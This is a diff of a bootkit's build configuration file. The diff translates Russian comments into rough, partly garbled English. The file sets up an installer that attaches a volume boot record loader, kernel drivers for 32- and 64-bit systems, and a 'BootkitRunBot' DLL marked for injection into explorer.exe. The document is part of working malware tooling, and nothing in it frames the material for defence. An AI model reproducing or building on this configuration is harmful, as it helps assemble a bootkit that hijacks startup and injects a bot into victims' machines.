--- a/BkBuild/setupdll.cfg
+++ b/BkBuild/setupdll.cfg
@@ -1,24 +1,24 @@
-; Конфигурационный файл для утилиты FJ
-; Описывает драйвера и библиотеки, которые необходимо прикрепить к инсталлеру
-; При запуске инсталлер определяет разрядность ОС и устанавливает соответствующий драйвер
+;The configuration file for the utility FJ
+;It describes the drivers and libraries that must be attached to the installer
+;When you run the installer detects bit operating system and installs the appropriate driver
 
-; Исходный файл инсталлера (может быть как EXE, так и DLL)
+;The original installer file (can be either EXE, or DLL)
 SOURCE: ..\bin\Release\i386\setupdll.dll
 
-; Файл, в который будет записан результат 
+;The file in which the result will be recorded
 OUT: Release\setupdll.dll
 
-; Начальный загрузчик
+;Bootloader
 BIN: Release\vbr.com
 
-; Драйвер для 32х-битной ОС
+;Driver for 32-bit OS
 DRV: ..\bin\Release\i386\kloader.sys
 
 
-; Драйвер для 64х-битной ОС
+;Driver for the 64-bit OS
 ;DRV: ..\bin\release\amd64\kloader.sys
 
-; 32х-битная DLL
+;32x-bit DLL
 DLL: BootkitRunBot.dll
-; Список процессов куда инжектить 32х битную DLL
+;Process list where 32-bit DLL Inject
 explorer.exe
